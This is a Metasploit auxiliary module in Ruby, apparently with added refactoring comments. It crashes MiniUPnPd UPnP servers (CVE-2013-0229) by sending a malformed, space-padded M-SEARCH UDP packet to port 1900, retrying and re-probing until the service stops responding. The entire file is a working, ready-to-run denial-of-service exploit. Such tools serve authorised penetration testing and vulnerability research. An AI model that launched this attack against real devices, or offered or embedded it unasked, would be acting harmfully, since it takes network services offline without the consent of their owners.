Path: blob/master/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
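##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  # Length, in bytes, that the malformed M-SEARCH request is padded to before
  # it is sent (was an inline literal; named so the padding and the author's
  # rationale for it live in one place).
  PACKET_SIZE = 1500

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MiniUPnPd 1.4 Denial of Service (DoS) Exploit',
        'Description' => %q{
          This module allows remote attackers to cause a denial of service (DoS)
          in MiniUPnP 1.0 server via a specifically crafted UDP request.
        },
        'Author' => [
          'hdm', # Vulnerability discovery
          'Dejan Lukan' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-0229' ],
          [ 'OSVDB', '89625' ],
          [ 'BID', '57607' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play/' ],
          [ 'URL', 'https://www.hdm.io/writing/SecurityFlawsUPnP.pdf' ]
        ],
        'DisclosureDate' => '2013-03-27',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(1900),
        OptInt.new('ATTEMPTS', [true, 'Max number of attempts to DoS the remote MiniUPnP ending', 3 ])
      ]
    )
  end

  # Sends +probe+ over +udp_sock+ and waits for one reply datagram.
  #
  # @param udp_sock [#put, #recvfrom] connected UDP socket (the parameter
  #   deliberately shadows the mixin accessor of the same name, as the
  #   original did, so existing callers keep working)
  # @param probe [String] payload to send
  # @return [String, nil] the reply payload, or nil when recvfrom returned
  #   nothing usable (no array, or an empty/missing payload) before it gave up
  def send_probe(udp_sock, probe)
    udp_sock.put(probe)
    # recvfrom returns an array whose first element is the payload; only that
    # element is of interest. Destructuring a nil return leaves +data+ nil, so
    # the nil case no longer raises on the #empty? call.
    data, = udp_sock.recvfrom
    data unless data.nil? || data.empty?
  end

  # Checks that the UPnP service answers an ordinary M-SEARCH, then sends the
  # malformed request up to ATTEMPTS times, re-probing after each send until
  # the service stops answering.
  #
  # The UDP socket is released in an +ensure+ block so it is closed on the
  # "service not found" early return, on the "unresponsive" break, after the
  # loop, and if a socket call raises part way through (the original only
  # disconnected on the non-raising paths).
  def run
    # Plain M-SEARCH probe used to tell whether the service is up.
    msearch_probe = "M-SEARCH * HTTP/1.1\r\n"
    msearch_probe << "Host:239.255.255.250:1900\r\n"
    msearch_probe << "ST:upnp:rootdevice\r\n"
    msearch_probe << "Man:\"ssdp:discover\"\r\n"
    msearch_probe << "MX:3\r\n"
    msearch_probe << "\r\n"

    # The server reads this request line by line; the malformation is the
    # missing CRLF after the ST line.
    sploit = "M-SEARCH * HTTP/1.1\r\n"
    sploit << "HOST: 239.255.255.250:1900\r\n"
    sploit << 'ST:uuid:schemas:device:MX:3'
    # Per the original author: the packet can be at most PACKET_SIZE bytes, so
    # the remainder is filled with spaces, which in their view makes the crash
    # more likely. ljust yields exactly what the former
    # `sploit += ' ' * (PACKET_SIZE - sploit.length)` did.
    sploit = sploit.ljust(PACKET_SIZE)

    # connect to the UDP port
    connect_udp

    print_status("#{rhost}:#{rport} - Checking UPnP...")
    if send_probe(udp_sock, msearch_probe).nil?
      print_error("#{rhost}:#{rport} - UPnP end not found")
      return
    end

    (1..datastore['ATTEMPTS']).each do |attempt|
      print_status("#{rhost}:#{rport} - UPnP DoS attempt #{attempt}...")

      # send the malformed request to the target
      print_status("#{rhost}:#{rport} - Sending malformed packet...")
      udp_sock.put(sploit)

      # re-probe to see whether the service still answers
      print_status("#{rhost}:#{rport} - The target should be unresponsive now...")
      if send_probe(udp_sock, msearch_probe).nil?
        print_good("#{rhost}:#{rport} - UPnP unresponsive")
        break
      end

      print_status("#{rhost}:#{rport} - UPnP is responsive still")
    end
  ensure
    # Guarded so a failure inside connect_udp (no socket yet) does not turn
    # into a second error from the cleanup path.
    disconnect_udp if udp_sock
  end
end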